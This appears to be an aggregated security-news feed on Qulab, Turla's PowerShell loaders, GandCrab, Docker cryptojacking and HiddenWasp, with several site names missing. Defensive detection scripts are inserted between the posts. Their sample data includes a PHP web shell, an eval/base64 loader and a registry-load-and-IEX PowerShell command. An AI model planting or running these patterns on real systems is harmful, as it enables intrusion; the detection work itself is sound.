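    """Run both checks: every added or modified PHP file is scanned, and the
    files with hits are the ones to delete and restore from the backup."""
    diff = compare_with_backup(site, backup)
    findings = {}
    for path in diff["added"] + diff["modified"]:
        if path.endswith((".php", ".phtml", ".inc")):
            hits = scan_php_source(site[path].decode("utf-8", "replace"))
            if hits:
                findings[path] = hits
    return diff, findings


# Constructed sample: a clean backup and a snapshot of the live site in which
# index.php gained an injected loader and a new file appeared under wp-includes.
CLEAN_INDEX = b"<?php\nrequire __DIR__ . '/wp-blog-header.php';\n"
INJECTED_INDEX = CLEAN_INDEX + b"<?php eval(base64_decode('aWYoMSl7fQ==')); ?>\n"
DROPPED_FILE = b"<?php if (isset($_POST['c'])) { system($_POST['c']); } ?>\n"
CONFIG = b"<?php define('DB_NAME', 'site');\n"

BACKUP_FILES = {"index.php": CLEAN_INDEX, "wp-config.php": CONFIG,
                "robots.txt": b"User-agent: *\n"}
SITE_FILES = {"index.php": INJECTED_INDEX, "wp-config.php": CONFIG,
              "wp-includes/cache.php": DROPPED_FILE}

if __name__ == "__main__":
    diff, findings = triage(SITE_FILES, BACKUP_FILES)
    print("changed files:", diff)
    for path, hits in findings.items():
        print(f"{path}: {', '.join(hits)}  -> delete and restore from backup")
```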

Website malware detection and removal tools also help

Many website malware detection and removal tools make the job easier. Any of these can be used to detect and remove website malware effectively.


The post How to Detect and Remove Malware from Websites appeared first on .

Cryptocurrency Scammers Use YouTube For Promotion

Are you a cryptocurrency enthusiast who loves watching YouTube videos about Bitcoin and other cryptocurrencies? If so, be very careful about the YouTube channels you visit. YouTube, home to millions of content creators and online video consumers, is teeming with scammers and phishers. For quite some time now Google has been actively taking down videos that host malicious links in their description, and even entire YouTube channels. However, campaigns on YouTube promoting “Bitcoin generator” programs, which claim to be an easy, painless way of creating bitcoins, continue to appear one after another.

The Bitcoin generator tool is nothing but an espionage program that steals user information from the computer once it is executed. Videos promoting bitcoin generator website named continue to get re-uploaded on another YouTube channel once Google takes it down. On close inspection by researchers, the payload turned out to be the infamous Qulab espionage trojan, which installs itself on Windows under the directory %AppData%\amd64_microsoft-windows-netio-infrastructure as a file named msaudite.module.exe. Once installed, the payload gathers information from .wallet files (cryptocurrency wallets), collects text information and saves it to .txt files, and harvests persistent browser cookies and the login credentials cached by Steam, FileZilla and Discord. Qulab can also steal the contents of the Windows clipboard and immediately replace them with different data, which is useful for hijacking cryptocurrency transfers.

Although it carries the Bitcoin name, Bitcoin generator supports the theft of cryptocurrencies other than BTC. It also monitors transactions in the following currencies and services:

  • WMZ
  • WME
  • Qtum
  • Litecoin
  • Doge
  • Bytecoin
  • ZCash
  • WMX
  • VIA
  • QIWI
  • Graft
  • Dash
  • Bitcoin Gold
  • Yandex Money
  • WMU
  • Stratis
  • Neo
  • Ethereum
  • Lisk
  • Bitcoin Cash
  • Waves
  • WMR
  • Steam Trade Link
  • Monero
  • Electronium
  • Cardano

An extensive blog post on is posted which provides all the details on how Qulab performs its “magic” of stealing information beyond the scope of this article. According to, a more advanced version of Qulab has more capabilities beyond cryptocurrency wallet theft and other common keylogging techniques. Some of which are:

  • Browser stealing
  • Wallet Clipper
  • FTP creds
  • Discord / Telegram logs
  • Steam (Session / Trade links / 2FA Authenticator by abusing a third party software)
  • Telegram Bot through a proxy
  • Grabber

Qulab is a sophisticated trojan: it was developed as a combination of modules programmed in Delphi, C, .NET and C++, which makes it an exotic piece of malware. It follows the template set by AutoIT scripts (sold on the Dark Web), which automate trojan development through code reuse and recycling. opened a GitHub page where a working proof-of-concept explaining the fundamentals of AutoIT is explained. “These libraries have been written to allow easy integration into your own scripts and are a very valuable resource for any programmer,” explained

The authors of Qulab built a “garbage collection” module into the malware to evade detection. With its entourage of features, Qulab uses a lot of memory, which is then unavailable to the operating system and other programs. As memory approaches full utilization, Windows is forced to use the hard drive as virtual memory, which end users feel as a drop in the computer’s performance.


The post Cryptocurrency Scammers Use YouTube For Promotion appeared first on .

Security Affairs newsletter Round 216 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.



Police seized Bestmixer, the mixing service washed at least $200 million in a year
Remarks on NATO and its approach to the cyber offensive
Sectigo says that most of certificates reported by Chronicle analysis were already revoked
BlueKeep scans observed from exclusively Tor exit nodes
Crooks leverage .htaccess injector on Joomla and WordPress sites for malicious redirects
First American Financial exposed 16 years worth of personal and financial documents
Hacker breached Perceptics, a US maker of license plate readers
APT10 is back with two new loaders and new versions of known payloads
DuckDuckGo Address Bar Spoofing
Internet scans found nearly one million systems vulnerable to BlueKeep
Shade Ransomware is very active outside of Russia and targets more English-speaking victims
Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw
All Docker versions affected by an unpatched race condition issue
Google white hat hacker found code execution flaw in Notepad
HawkEye Keylogger is involved in attacks against business users
News aggregator Flipboard disclosed a data breach
TA505 is expanding its operations
Using Public Wi-Fi? Your data can be hacked easily! Here’s How…
Checkers double drive-thru restaurants chain discloses card breach
Convert Plus WordPress plugin flaw allows hackers to create Admin accounts
Emissary Panda APT group hit Government Organizations in the Middle East
Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers
VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs
0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler
HiddenWasp, a sophisticated Linux malware borrows from Mirai and Azazel
Microsoft warns for the second time of applying BlueKeep patch
Security expert shows how to bypass macOS Gatekeeper
The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains
Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows
Cryptojacking campaign uses Shodan to scan for Docker hosts to hack
GandCrab operators are shutting down their operations
Russian military plans to replace Windows with Astra Linux

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 216 – News of the week appeared first on Security Affairs.

ESET analyzes Turla APT’s usage of weaponized PowerShell

Turla, the Russia-linked cyberespionage group, is weaponizing PowerShell scripts and is using them in attacks against EU diplomats.

Turla (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON), the Russia-linked APT group, is using weaponized PowerShell scripts in attacks aimed at EU diplomats.

Turla group has been active since at least 2007 targeting government organizations and private businesses.

The long list of previously known victims includes the Swiss defense firm RUAG, the US Department of State and the US Central Command.

Turla is back: in a recent wave of attacks, the cyberspies targeted diplomatic entities in Eastern Europe.

“To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. This allows them to bypass detection that can trigger when a malicious executable is dropped on disk.” reads the report published by ESET.

The PowerShell scripts used by Turla in recent attacks allow direct, in-memory loading and execution of malicious executables and libraries avoiding detection.

Turla first used PowerShell in 2018; at the time, experts from Kaspersky Lab collected evidence of overlaps between the activity of the Russian APT groups Turla and Sofacy.

Kaspersky Lab said the APT was experimenting with PowerShell in-memory loading to bypass security protections; at the time, the loader used by the cyberspies was based on the legitimate PoshSec-Mod software, but experts believe it often crashed because of bugs in the code.

ESET believes that now the problems have been solved and the Turla threat actors leverage the PowerShell scripts to load an array of malware.

“The PowerShell scripts are not simple droppers; they persist on the system as they regularly load into memory only the embedded executables.” continues the report.

“We have seen Turla operators use two persistence methods:

  • A Windows Management Instrumentation (WMI) event subscription
  • Alteration of the PowerShell profile (profile.ps1 file).”

When the persistence is implemented through WMI, attackers create two WMI event filters and two WMI event consumers. The consumers are command lines launching base64-encoded PowerShell commands that load a PowerShell script stored in the Windows registry.

The second method used by the group consists of altering the PowerShell profile, a script that runs whenever PowerShell starts.

In both cases the decryption of payloads stored in the registry is done using the 3DES algorithm. Once decrypted, a PowerShell reflective loader then comes into action.
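A defender-side check for the two persistence methods described above, added here as an example (not code from the ESET report): it decodes the base64 command line of a WMI command-line event consumer and looks for the registry-load-then-execute pattern, and applies the same indicators to a profile.ps1. The consumer records and profile text are constructed; on a real host they would come from `Get-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer` and from the profile files.

```python
"""Review WMI event consumers and PowerShell profile scripts for the
persistence pattern described above: a base64-encoded PowerShell command that
pulls a script out of the registry and runs it in memory. Added example, not
code from the ESET report; the consumer records are constructed here and in
practice would come from Get-CimInstance -Namespace root/subscription
-ClassName CommandLineEventConsumer and from the profile.ps1 files."""
import base64
import re
from typing import Optional

# What a decoded command is checked for (case-insensitive, like PowerShell).
INDICATORS = {
    "reads registry": re.compile(r"Get-ItemProperty|Registry::|HK(LM|CU)[:\\]", re.I),
    "decodes base64": re.compile(r"FromBase64String", re.I),
    "3DES decryption": re.compile(r"TripleDES", re.I),
    "in-memory execution": re.compile(
        r"\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load", re.I),
}
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the -EncodedCommand payload decoded from base64/UTF-16LE,
    or None when the command line carries no encoded command."""
    match = ENC_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_script(text: str) -> list:
    """Names of the indicators present in a PowerShell snippet."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def review_wmi_consumer(consumer: dict) -> dict:
    """Decode the consumer's command line if needed and rate it. The
    registry-load-then-execute combination is what the text describes."""
    decoded = decode_encoded_command(consumer["CommandLine"])
    hits = assess_script(decoded if decoded is not None else consumer["CommandLine"])
    suspicious = "reads registry" in hits and (
        "in-memory execution" in hits or "decodes base64" in hits)
    return {"name": consumer["Name"], "encoded": decoded is not None,
            "decoded": decoded, "indicators": hits, "suspicious": suspicious}


def review_profile(path: str, text: str) -> dict:
    """profile.ps1 runs at every PowerShell start, so the same indicators apply."""
    hits = assess_script(text)
    return {"name": path, "indicators": hits, "suspicious": "reads registry" in hits}


def encode_powershell(script: str) -> str:
    """Produce the -EncodedCommand form; used here only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed samples: one consumer that loads a blob from the registry and
# executes it in memory, one benign consumer, and an innocuous profile.
SAMPLE_SCRIPT = ("$p = (Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Example\\Stage').Blob; "
                 "IEX ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($p)))")
SAMPLE_CONSUMERS = [
    {"Name": "SCM Event Log Consumer",
     "CommandLine": "powershell.exe -NoP -W Hidden -enc " + encode_powershell(SAMPLE_SCRIPT)},
    {"Name": "NightlyBackup",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c C:\Tools\backup.bat"},
]
SAMPLE_PROFILE = "Set-Location C:\\Users\\alice\\Projects\nImport-Module posh-git\n"

if __name__ == "__main__":
    for result in [review_wmi_consumer(c) for c in SAMPLE_CONSUMERS] + [
            review_profile("profile.ps1", SAMPLE_PROFILE)]:
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} {result['name']}: {result['indicators']}")
```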

“The payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework” reads the analysis.

“The executable is hardcoded in the script and is loaded directly into the memory of a randomly chosen process that is already running on the system.”

The attackers avoid injecting into processes that belong to security products, such as the Kaspersky anti-virus software.

In some samples, Turla attackers have modified the PowerShell script in order to bypass the Antimalware Scan Interface (AMSI) implemented by Windows.

“This is an interface allowing any Windows application to integrate with the installed antimalware product. It is particularly useful for PowerShell and macros.” continues the report.

“They did not find a new bypass but re-used a technique presented at Black Hat Asia 2018 in the talk The Rise and Fall of AMSI. It consists of the in-memory patching of the beginning of the function AmsiScanBuffer in the library amsi.dll.”

The patched AmsiScanBuffer no longer passes the buffer to the antimalware product, so the script content is never scanned.

The PowerShell loader is used to launch malware; one of these payloads is a backdoor based on the RPC protocol.

Turla also has a lightweight PowerShell backdoor in its arsenal, tracked as PowerStallion, which uses cloud storage as its C2 server.

A few weeks ago, ESET researchers discovered a Turla backdoor tracked as LightNeuron that was specifically developed to hijack Microsoft Exchange mail servers.

ESET confirmed that the PowerShell scripts have been used in campaigns aimed at political targets in Eastern Europe. According to the researchers, the same scripts are also used against other targets in Western Europe and the Middle East.

“Finally, the usage of open-source tools does not mean Turla has stopped using its custom tools. The payloads delivered by the PowerShell scripts, the RPC backdoor and PowerStallion, are actually very customized. Our recent analysis of Turla LightNeuron is additional proof that this group is still developing complex, custom malware.” concludes the report.

The ESET report includes technical details and IoCs associated with the recent attacks.


Pierluigi Paganini

(SecurityAffairs – Turla, hacking)


The post ESET analyzes Turla APT’s usage of weaponized PowerShell appeared first on Security Affairs.

GandCrab operators are shutting down their operations

GandCrab first appeared in the threat landscape in early 2018 and continuously evolved over time. Now operators are shutting down their operations.

In early 2018, experts at the cyber security firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab, advertised in the Russian hacking community on the dark web. Researchers noticed that its authors leveraged the RIG and GrandSoft exploit kits to distribute the malware.

Over more than a year its operators released several versions with numerous enhancements, but now they are shutting down the operation and affiliates are being told to stop distributing the ransomware.

In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.

According to security researchers Damian and David Montenegro, who have followed the evolution of GandCrab since its appearance, the GandCrab operators announced their decision to shut down their operation in a post on popular hacking forums:

The operators claimed to have generated more than $2 billion in ransom payments, earning on average $2.5 million per week, and to have netted $150 million that they have now invested in legal activities.

However, experts believe the $2 billion claim is not credible; below is an excerpt from a post published by Bleeping Computer:

“While the operators behind GandCrab most likely made many millions of dollars, the claims of $2 billion in ransom payments are very likely to be untrue.”

The operators will no longer promote the GandCrab ransomware and have asked affiliates to stop distributing it within 20 days.

They are also warning victims that time is running out and that they must pay the ransom as soon as possible to avoid losing their files forever.

It is not clear whether the operators will release the decryption keys once they go out of business.

Stay tuned …


Pierluigi Paganini

(SecurityAffairs – GandCrab ransomware, malware)

The post GandCrab operators are shutting down their operations appeared first on Security Affairs.

Cryptojacking campaign uses Shodan to scan for Docker hosts to hack

A new cryptojacking campaign was spotted by experts at Trend Micro: crooks are using Shodan to scan for Docker hosts with exposed APIs.

Threat actors are using the popular Shodan search engine to find Docker hosts and abuse them in a cryptojacking campaign. The attackers leverage self-propagating Docker images infected with Monero miners, together with scripts that use Shodan to find other vulnerable installs and compromise them.

The experts discovered the attacks after setting up a machine that simulated a Docker host with an exposed API.

“We discovered that the images are first deployed using a script (, detected as PUA.Linux.XMRMiner.AA.component) that checks hosts with publicly exposed APIs. It then uses Docker commands (POST /containers/create) to remotely create the malicious container. This script also starts an SSH daemon inside the container for remote communication.” reads the analysis published by Trend Micro.

“The script then calls a Monero coin-mining binary, darwin (detected as PUA.Linux.XMRMiner.AA), to run in the background. As with all cryptocurrency miners, it uses the resources of the host system to mine cryptocurrency (Monero in this instance) without the owner’s knowledge.”

The scripts used in this campaign find vulnerable hosts via Shodan: they look for hosts with port 2375 open and, after brute-forcing them, deploy further infected containers.

The exposed APIs allow the attackers to execute commands on the Docker hosts, letting them manage containers and, of course, deploy infected images from a Docker Hub repository under their control.

The analysis of the logs and traffic data coming to and from the honeypot, revealed that the attackers used a container from a public Docker Hub repository named zoolu2. Researchers discovered that the repository contained nine images comprised of custom-made shells, Python scripts, configuration files, as well as Shodan and cryptocurrency-mining binaries.

The good news is that Docker discovered the same repository independently and took it offline.

The same threat actors also used another Docker Hub repository, associated with the ‘marumira’ account, in previous attacks. Once that account was deactivated they moved to zoolu2.

While the attackers run their scan for Docker hosts to compromise, a custom-built Monero coin-mining binary executes in the background.

“An interesting characteristic of the attack is that it uses a cryptocurrency miner that is being built from scratch instead of an existing one.” continues the report.

Every time an exposed Docker host is discovered it is added to a list (the iplist.txt file), which the attackers then sort to remove duplicate IPs. The script also checks whether the Docker host already runs a cryptocurrency-mining container and deletes it if it exists.

The list is sent to the C2 servers, which deploy additional containers to the other exposed hosts on it.
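A host-side audit for the two conditions this campaign depends on, added here as an example (not code from the Trend Micro report): the Docker API exposed over plain TCP on port 2375, and containers running images from repositories outside an allow-list. The daemon.json dicts and the `docker ps` rows are constructed; zoolu2 is the repository named above, the image name after it is a placeholder.

```python
"""Audit a Docker host for the two conditions this campaign relies on: a Docker
API reachable over plain TCP (port 2375, no TLS) and containers running images
from repositories the organisation does not control. Added example, not code
from the Trend Micro report. The inputs are constructed here; in practice the
config comes from /etc/docker/daemon.json and the container rows from
`docker ps --format '{{json .}}'`."""
from urllib.parse import urlparse

ANY_ADDRESS = {None, "", "0.0.0.0", "::"}


def assess_daemon_config(config: dict) -> list:
    """Findings about the 'hosts' and TLS keys of a daemon.json.
    unix:// and fd:// listeners are local and skipped."""
    findings = []
    for host in config.get("hosts", []):
        url = urlparse(host)
        if url.scheme != "tcp":
            continue
        if not config.get("tlsverify"):
            findings.append(f"{host}: API exposed over TCP without client certificate verification")
        elif not all(k in config for k in ("tlscacert", "tlscert", "tlskey")):
            findings.append(f"{host}: tlsverify set but certificate paths are incomplete")
        if url.hostname in ANY_ADDRESS:
            findings.append(f"{host}: bound to every interface, reachable from the Internet if unfiltered")
    return findings


def image_namespace(image: str) -> str:
    """Registry/namespace part of an image reference, with tag or digest removed.
    Official Docker Hub images (no slash) map to 'library'."""
    ref = image.split("@", 1)[0]                 # drop @sha256:... digest
    if ref.rfind(":") > ref.rfind("/"):          # a ':' after the last '/' is a tag
        ref = ref[:ref.rfind(":")]
    return ref.rsplit("/", 1)[0] if "/" in ref else "library"


def untrusted_containers(containers: list, trusted_namespaces: set) -> list:
    """Containers whose image namespace is not on the allow-list."""
    return [c for c in containers if image_namespace(c["Image"]) not in trusted_namespaces]


# Weak and hardened daemon.json, as dicts. The weak one is the setting the
# campaign's Shodan queries look for; the hardened one keeps the TCP listener
# but on one address, port 2376, and with mutual TLS.
WEAK_CONFIG = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
HARDENED_CONFIG = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}

# Constructed `docker ps` rows: IDs are placeholders. zoolu2 is the repository
# named in the article (the image name after it is made up); the internal
# registry and the official nginx image are the only trusted sources here.
SAMPLE_CONTAINERS = [
    {"ID": "0000000000aa", "Image": "registry.internal/payments/api:1.4", "Names": "api"},
    {"ID": "0000000000bb", "Image": "zoolu2/auto:latest", "Names": "stoic_turing"},
    {"ID": "0000000000cc", "Image": "nginx:1.19", "Names": "edge"},
]
TRUSTED_NAMESPACES = {"registry.internal/payments", "library"}

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {assess_daemon_config(cfg) or ['no findings']}")
    for c in untrusted_containers(SAMPLE_CONTAINERS, TRUSTED_NAMESPACES):
        print(f"untrusted image {c['Image']} running as {c['Names']}")
```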

Attacks like the one detected by Trend Micro are not a novelty in the threat landscape, a similar campaign was also spotted by researchers from Imperva in early March.

The same malicious campaign was also analyzed by the Alibaba Cloud Security team that tracked it as Xulu.

“These threats are often successful, not only due to the exploitation of flaws and vulnerabilities in the container software but also due to misconfiguration, which remains a constant challenge for organizations. In this case, the hosts that have exposed APIs are not just victims of cryptocurrency-mining operations — they also contribute further to the distribution of the infected containers.” concludes Trend Micro.

“Unwanted cryptocurrency-mining activity can lead to additional resource load for the targets. In this example, if the Docker host is running on internal infrastructure, other hosts can also suffer. On the other hand, if the Docker host is using a cloud service provider, the organization can accrue additional charges due to the higher resource usage.”


Pierluigi Paganini

(SecurityAffairs – Docker, hacking)

The post Cryptojacking campaign uses Shodan to scan for Docker hosts to hack appeared first on Security Affairs.

HiddenWasp, a sophisticated Linux malware borrows from Mirai and Azazel

Security experts at Intezer have discovered a new Linux malware tracked as ‘HiddenWasp’ that borrows code from Mirai and the Azazel rootkit.

HiddenWasp is a new, sophisticated Linux malware that is still undetected by the majority of anti-virus solutions. According to the experts at Intezer, the malware has been used in targeted attacks.

“Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS activity. It is a trojan purely used for targeted remote control.” reads the analysis published by Intezer.

“Evidence shows in high probability that the malware is used in targeted attacks for victims who are already under the attacker’s control, or have gone through a heavy reconnaissance.”

Researchers from Intezer said that most of HiddenWasp’s code is unique, but the authors borrowed chunks of code from publicly available open-source malware such as Mirai and the Azazel rootkit.

Like the Linux variant of the Winnti backdoor recently documented by Chronicle, HiddenWasp is composed of a user-mode rootkit, a Trojan, and a script for the initial deployment. 

The script establishes persistence by creating a new system user account, and it updates older variants if the system was already compromised. It then downloads a Tar archive containing the rootkit, the Trojan and the initial deployment script.

“The script will then proceed to download a tar compressed archive from a download server according to the architecture of the compromised system. This tarball will contain all of the components from the malware, containing the rootkit, the trojan and an initial deployment script” continues the experts.

Once the components are installed, the main Trojan binary is executed and the rootkit is added via the LD_PRELOAD mechanism. The malicious code also sets up various environment variables, and the script attempts to gain persistence by adding the Trojan to /etc/rc.local.

“It seems that this actor changed the default environment variable from Azazel, that one being HIDE_THIS_SHELL for I_AM_HIDDEN.” continues the experts. “We have based this conclusion on the fact that the environment variable HIDE_THIS_SHELL was not used throughout the rest of the components of the malware and it seems to be residual remains from Azazel original code. “

Researchers also found that the HiddenWasp’s rootkit uses an algorithm similar to the one used by the infamous Mirai.

The rootkit is a user-space rootkit enforced via the LD_PRELOAD mechanism and delivered as a stripped ET_DYN ELF binary.
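The persistence artefacts described in the last few paragraphs, checked from the defender's side as an added example (not code from the Intezer report): LD_PRELOAD in a process environment, the I_AM_HIDDEN marker variable, unknown entries in /etc/ld.so.preload and /etc/rc.local, and the e_type of a preloaded library. The environ block, file contents, library path and pid are constructed placeholders, not indicators from the report.

```python
"""Host checks for the HiddenWasp persistence artefacts described above: a
library injected through LD_PRELOAD, the I_AM_HIDDEN environment variable and
an entry appended to /etc/rc.local. Added example, not code from the Intezer
report. Inputs are constructed here; on a real host they come from
/proc/<pid>/environ, /etc/ld.so.preload, /etc/rc.local and the first bytes of
any preloaded library."""
from typing import Optional

# Marker variables: I_AM_HIDDEN is HiddenWasp's, HIDE_THIS_SHELL is the Azazel
# original it replaced. Neither belongs in a legitimate process environment.
ROOTKIT_ENV_VARS = {"I_AM_HIDDEN", "HIDE_THIS_SHELL"}
ELF_TYPES = {1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}


def parse_proc_environ(raw: bytes) -> dict:
    """/proc/<pid>/environ is a NUL-separated list of KEY=VALUE entries."""
    env = {}
    for item in raw.split(b"\0"):
        if b"=" in item:
            key, value = item.split(b"=", 1)
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def check_process_env(pid: int, env: dict) -> list:
    """LD_PRELOAD in a process environment and the rootkit marker variables."""
    findings = []
    if env.get("LD_PRELOAD"):
        findings.append(f"pid {pid}: LD_PRELOAD={env['LD_PRELOAD']}")
    for var in sorted(ROOTKIT_ENV_VARS.intersection(env)):
        findings.append(f"pid {pid}: rootkit marker variable {var} is set")
    return findings


def check_ld_so_preload(text: str, approved: set) -> list:
    """Every library listed in /etc/ld.so.preload is loaded into every dynamically
    linked process; anything not explicitly approved is reported."""
    libs = (line.strip() for line in text.splitlines())
    return [f"ld.so.preload: unapproved library {lib}"
            for lib in libs if lib and not lib.startswith("#") and lib not in approved]


def check_rc_local(text: str, expected: set) -> list:
    """Commands in /etc/rc.local other than the shebang, comments, 'exit 0' and the
    commands known to belong on this host."""
    findings = []
    for line in text.splitlines():
        cmd = line.strip()
        if not cmd or cmd.startswith("#") or cmd == "exit 0" or cmd in expected:
            continue
        findings.append(f"rc.local: unexpected command {cmd!r}")
    return findings


def elf_type(header: bytes) -> Optional[str]:
    """e_type of an ELF header (offset 16, byte order from EI_DATA at offset 5).
    ET_DYN is the form the rootkit is delivered in; None means not an ELF file."""
    if len(header) < 18 or header[:4] != b"\x7fELF":
        return None
    order = "little" if header[5] == 1 else "big"
    e_type = int.from_bytes(header[16:18], order)
    return ELF_TYPES.get(e_type, f"unknown({e_type})")


def audit(pid: int, environ: bytes, ld_so_preload: str, rc_local: str,
          approved_libs: set, expected_rc: set) -> list:
    """Run all checks and return the combined findings."""
    return (check_process_env(pid, parse_proc_environ(environ))
            + check_ld_so_preload(ld_so_preload, approved_libs)
            + check_rc_local(rc_local, expected_rc))


# Constructed inputs for a host showing all three artefacts. The library path,
# the rc.local entry and the pid are placeholders, not indicators from the report.
SAMPLE_ENVIRON = (b"PATH=/usr/bin:/bin\0LD_PRELOAD=/usr/lib/libexample-preload.so\0"
                  b"I_AM_HIDDEN=1\0HOME=/root\0")
SAMPLE_LD_SO_PRELOAD = "# libraries preloaded into every process\n/usr/lib/libexample-preload.so\n"
SAMPLE_RC_LOCAL = "#!/bin/sh -e\n/usr/local/sbin/site-init\n/tmp/.cache/svc &\nexit 0\n"
# A 64-bit little-endian ELF header with e_type = 3 (ET_DYN), padding elided.
SAMPLE_ELF_HEADER = b"\x7fELF\x02\x01\x01" + b"\0" * 9 + (3).to_bytes(2, "little")

if __name__ == "__main__":
    for f in audit(4242, SAMPLE_ENVIRON, SAMPLE_LD_SO_PRELOAD, SAMPLE_RC_LOCAL,
                   approved_libs=set(), expected_rc={"/usr/local/sbin/site-init"}):
        print(f)
    print("preloaded library type:", elf_type(SAMPLE_ELF_HEADER))
```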

Experts linked the Trojan component to ChinaZ’s Elknot malware and other ChinaZ implants, which suggests that the HiddenWasp author may have integrated modified versions of Elknot code shared in Chinese hacking forums.

Some artifacts found by the experts also belong to the Chinese open-source Linux rootkit Adore-ng, likely because systems targeted with HiddenWasp had previously been compromised with that rootkit.

“Linux malware may introduce new challenges for the security community that we have not yet seen in other platforms. The fact that this malware manages to stay under the radar should be a wake up call for the security industry to allocate greater efforts or resources to detect these threats.” concludes the report.

“Linux malware will continue to become more complex over time and currently even common threats do not have high detection rates, while more sophisticated threats have even lower visibility.”


Pierluigi Paganini

(SecurityAffairs – HiddenWasp, Linux malware)

The post HiddenWasp, a sophisticated Linux malware borrows from Mirai and Azazel appeared first on Security Affairs.

Researchers fight ransomware attacks by leveraging properties of flash-based storage

Ransomware continues to pose a serious threat to organizations of all sizes. In a new paper, “Project Almanac: A Time-Traveling Solid State Drive,” University of Illinois students Chance Coats and Xiaohao Wang and Assistant Professor Jian Huang from the Coordinated Science Laboratory look at how they can use the commodity storage devices already in a computer to save the files without having to pay the ransom. Recovering data encrypted by a variety of ransomware families …

The post Researchers fight ransomware attacks by leveraging properties of flash-based storage appeared first on Help Net Security.

Is This The Start Of Open Source Malware for Linux?

Linux is considered a more secure and privacy-focused operating system than Windows, not only because of its low market share (only 2% of all installed desktop operating systems) but also because of an architecture patterned after Unix. However, no device connected to the Internet can approach absolute security, whatever operating system it runs; the two are a contradiction in terms. Intezer Labs, represented by its security researcher Ignacio Sanmillan, has revealed a malware named HiddenWasp that is specifically designed to target Linux machines and infects its victims with a rootkit-like component. A Chinese hacker group previously used malware named Winnti to carry out the same kind of attack against Linux, which led Sanmillan to suspect that HiddenWasp is a creation of the same group.

“We found some of the environment variables used in an open-source rootkit known as Azazel. In addition, we also see a high rate of shared strings with other known ChinaZ malware, reinforcing the possibility that actors behind HiddenWasp may have integrated and modified some MD5 implementation from [the] Elknot [malware] that could have been shared in Chinese hacking forums,” explained Sanmillan.

Intezer Labs researchers also investigated the Adore-ng rootkit, open-source software a portion of whose code was previously used in the Mirai malware. A small part of the rootkit’s properties is similar to the Azazel rootkit, and HiddenWasp contains a rootkit component that closely resembles Adore-ng. “We observed that [the HiddenWasp] files were uploaded to VirusTotal using a path containing the name of a Chinese-based forensics company known as Shen Zhou Wang Yun Information Technology Co., Ltd. Furthermore, the malware implants seem to be hosted in servers from a physical server hosting company known as ThinkDream located in Hong Kong,” added Sanmillan.

As of this writing, Sanmillan’s team still does not know which Chinese group is behind the development of the malware. Infecting a Linux system takes considerable effort, since the user has to type the root password to install software deep into the system. Because a user does not have root access by default on Linux, all HiddenWasp can do is install its rootkit component as a user-level process. The team continues to investigate the malware: the second-stage payload is not yet known, but it most probably has to do with the RAT module of HiddenWasp.

“Unfortunately, I don’t know what is the initial infection vector. Based on our research, it seems most likely that this malware was used in compromised systems already controlled by the attacker. From our research, it looks like an implant from a targeted attack. It’s hard to say if it’s used by [a] nation-sponsored attacker or someone else, but it is definitely not the usual DDOS/mining malware for quick profits,” concluded Sanmillan.

Intezer has published a comprehensive article on its official blog detailing the minute-by-minute operations of HiddenWasp from the moment it arrives on a vulnerable Linux installation. The open-source nature of Linux being matched by a somewhat “open source” piece of malware in HiddenWasp may start a new trend of open-source malware targeting Linux hosts.


The post Is This The Start Of Open Source Malware for Linux? appeared first on .

10 years of virtual dynamite: A high-level retrospective of ATM malware

It has been 10 years since the discovery of Skimer, the first malware specifically designed to attack automated teller machines (ATMs). At the time, the learning curve for understanding its functionality was rather steep, and analysis required specific knowledge of a manufacturer's ATM API functions and parameters, which were not publicly documented.

Before the discovery of Skimer, anti-malware researchers considered ATMs secure machines: proprietary hardware, non-standard operating systems, and a number of advanced protection techniques designed to prevent attacks using malicious code. Researchers eventually discovered that the most popular ATM manufacturers use a standard Windows operating system and add on auxiliary devices, such as a safe and a card reader.

Over time, the actors behind some of the newer ATM malware families, such as GreenDispenser and Tyupkin, realized that there is a generic Windows extension for financial services, the CEN/XFS API, that can be used to build malware that runs independently of the underlying hardware platform as long as the ATM manufacturer supports the framework. Such malware can trick the machine into dispensing cash, regardless of whether the attacker has a legitimate bank card.

